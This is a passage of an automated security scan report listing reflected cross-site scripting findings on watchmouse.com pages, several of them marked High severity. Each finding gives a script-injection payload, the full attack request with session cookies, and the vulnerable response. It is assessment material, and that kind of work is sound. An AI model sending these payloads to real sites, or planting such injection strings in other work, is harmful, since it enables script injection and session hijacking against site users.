Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2580612c6e889abb55a01fc21fecea09"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es8edef"><script>alert(1)</script>9db211844e/plans_price.php" method="post">
...[SNIP]...

1.255. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2e5"><script>alert(1)</script>97edefa43b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/plans_price.php6d2e5"><script>alert(1)</script>97edefa43b4 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-d234e6ed6a2ad07e92cd8e1715169d79"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/plans_price.php6d2e5"><script>alert(1)</script>97edefa43b4" method="post">
...[SNIP]...

1.256. http://www.watchmouse.com/es/plans_price.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb924"><script>alert(1)</script>4b3757cb1f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/plans_price.php?bb924"><script>alert(1)</script>4b3757cb1f1=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-79395280ffffee6a97dd2ba266ccc758"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/plans_price.php?bb924"><script>alert(1)</script>4b3757cb1f1=1" method="post">
...[SNIP]...

1.257. http://www.watchmouse.com/es/register.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de7dc"><script>alert(1)</script>a702ee620f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /esde7dc"><script>alert(1)</script>a702ee620f3/register.php?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-42644a2ca5d6ace08721d5d686ce09c8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/esde7dc"><script>alert(1)</script>a702ee620f3/register.php?vpackid=35" method="post">
...[SNIP]...

1.258. http://www.watchmouse.com/es/register.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cb77"><script>alert(1)</script>00443087748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/register.php6cb77"><script>alert(1)</script>00443087748?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:08 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-7519ae4f658868d82a56586a01dbb461"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/register.php6cb77"><script>alert(1)</script>00443087748?vpackid=35" method="post">
...[SNIP]...

1.259. http://www.watchmouse.com/es/register.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20379"><script>alert(1)</script>0895f9d3261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/register.php?vpackid=35&20379"><script>alert(1)</script>0895f9d3261=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-2dbb4e7ceb63b6b2c81b1d40aed9e263"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<a href="/en/register.php?vpackid=35&20379"><script>alert(1)</script>0895f9d3261=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.260. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ccdc"><script>alert(1)</script>576dd2045f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feature2ccdc"><script>alert(1)</script>576dd2045f7/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-32e33a90a1a6fdeeaf0416628ff582c4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature2ccdc"><script>alert(1)</script>576dd2045f7/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.261. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e30dc"><script>alert(1)</script>03aba4d349e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feature/transaction-monitoring-web-application-testing.htmle30dc"><script>alert(1)</script>03aba4d349e HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ef9af357f4d182aa92581ee822f6c19f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.htmle30dc"><script>alert(1)</script>03aba4d349e" method="post">
...[SNIP]...

1.262. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef042"><script>alert(1)</script>f5b11d50e0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feature/transaction-monitoring-web-application-testing.html?ef042"><script>alert(1)</script>f5b11d50e0c=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fb563c6017d0cf55bf1d5e82cc6e39e1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/transaction-monitoring-web-application-testing.html?ef042"><script>alert(1)</script>f5b11d50e0c=1" method="post">
...[SNIP]...

1.263. http://www.watchmouse.com/feed.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feed.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c5d"><script>alert(1)</script>60e3686757d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feed.php51c5d"><script>alert(1)</script>60e3686757d HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:10:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f61413f7ac2a91e95cd03c5d2fe0ecde"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feed.php51c5d"><script>alert(1)</script>60e3686757d" method="post">
...[SNIP]...

1.264. http://www.watchmouse.com/feed.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.watchmouse.com
Path:   /feed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 687b1<a>2e82533c893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feed.php/687b1<a>2e82533c893 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:10:18 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-837ad2275372175bc5a833af2988f681"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=utf-8
Content-Length: 22323

<?xml version="1.0" encoding="utf-8"?>
<!-- RSS generated by WatchMouse script -->
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>WatchMouse website moni
...[SNIP]...
<generator>/feed.php/687b1<a>2e82533c893</generator>
...[SNIP]...

1.265. http://www.watchmouse.com/fr/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6419d"><script>alert(1)</script>def6dce2293 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=16419d"><script>alert(1)</script>def6dce2293 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-ddd74b2b05d8c6f3b0cb8917517dbe23"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=16419d"><script>alert(1)</script>def6dce2293" method="post">
...[SNIP]...

1.266. http://www.watchmouse.com/fr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1291"><script>alert(1)</script>630ae9a337e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fra1291"><script>alert(1)</script>630ae9a337e/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-31c63956f37c81d71d24d7e0416b8bf7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fra1291"><script>alert(1)</script>630ae9a337e/" method="post">
...[SNIP]...

1.267. http://www.watchmouse.com/fr/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c03"><script>alert(1)</script>df6e6da6b47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/?75c03"><script>alert(1)</script>df6e6da6b47=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-2d11a1b996e01ca2a9d6d644907ba6f3"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
